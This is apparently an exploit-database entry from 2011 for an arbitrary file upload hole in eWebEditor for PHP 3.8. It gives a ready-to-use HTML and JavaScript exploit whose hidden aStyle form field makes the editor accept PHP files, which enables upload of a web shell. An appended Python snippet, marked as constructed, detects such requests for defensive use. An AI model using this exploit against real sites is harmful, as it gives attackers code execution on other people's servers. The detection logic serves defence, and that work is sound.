eWebEditor for PHP 3.8 arbitrary file upload 0day

2011-08-02T00:00:00
ID MYHACK58:62201131423
Type myhack58
Reporter Anonymous
Modified 2011-08-02T00:00:00

Description


The PHP version of eWebEditor is used far less than the ASP version, and I have rarely come across it. From what I have heard, it seems to be used a lot abroad. Do people in Taiwan like to use it? Something to keep an eye on.

EXP is as follows:

<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url value="http://www.xxx.com/ewebeditor/" size=100><br>
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||Arial||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
file:<input type=file name="uploadfile"><br>
<input type=button value=submit onclick=fsubmit()>
</form><br>
<script>
function fsubmit(){
    form = document.forms[0];
    form.action = form.url.value+'php/upload.php?action=save&type=FILE&style=toby57&language=en';
    alert(form.action);
    form.submit();
}
</script>
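
Detection logic for the request this form produces, added here as an example and not part of the original advisory: it flags POSTs to php/upload.php?action=save that carry a client-supplied aStyle[...] form field and reports any script extension found in the |||-delimited style value. The function names, the extension list, the placeholder host and the shortened sample body are constructed for illustration.

```python
from email import message_from_bytes
from urllib.parse import urlsplit, parse_qs

# Extensions a web server may execute (constructed, non-exhaustive list).
SCRIPT_EXTS = {"php", "php3", "php5", "phtml", "asp", "aspx", "jsp", "cgi"}

def form_fields(content_type, body):
    """Yield (name, value) for each part of a multipart/form-data body."""
    header = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n"
    for part in message_from_bytes(header + body).walk():
        name = part.get_param("name", header="content-disposition")
        if isinstance(name, str):
            yield name, part.get_payload(decode=True) or b""

def inspect_upload(url, content_type, body):
    """Return findings for one POST to the editor's upload endpoint."""
    target = urlsplit(url)
    if not target.path.lower().endswith("/php/upload.php"):
        return []
    if parse_qs(target.query).get("action") != ["save"]:
        return []
    findings = []
    for name, value in form_fields(content_type, body):
        if name.split("[", 1)[0] != "aStyle":
            continue  # only the style-definition field is of interest
        findings.append(f"client-supplied style field {name}")
        # The value is a '|||'-delimited record; extension lists use '|'.
        for field in value.decode("latin-1").split("|||"):
            hits = SCRIPT_EXTS & {e.strip().lower() for e in field.split("|")}
            if hits:
                findings.append("style permits script extension: " + ",".join(sorted(hits)))
    return findings

# Constructed sample request, shortened from the form above; host is a placeholder.
BOUNDARY = "constructedboundary"
def make_part(disposition, data):
    return f"--{BOUNDARY}\r\nContent-Disposition: form-data; {disposition}\r\n\r\n{data}\r\n"

SAMPLE_URL = "http://editor.example/ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en"
SAMPLE_CTYPE = f"multipart/form-data; boundary={BOUNDARY}"
SAMPLE_BODY = (
    make_part('name="aStyle[12]"', "toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg")
    + make_part('name="uploadfile"; filename="note.txt"', "constructed file body")
    + f"--{BOUNDARY}--\r\n"
).encode("ascii")

if __name__ == "__main__":
    for finding in inspect_upload(SAMPLE_URL, SAMPLE_CTYPE, SAMPLE_BODY):
        print(finding)
```

The aStyle field travels in the POST body, so access logs alone do not show it; this check belongs in a proxy, WAF or request logger that sees request bodies.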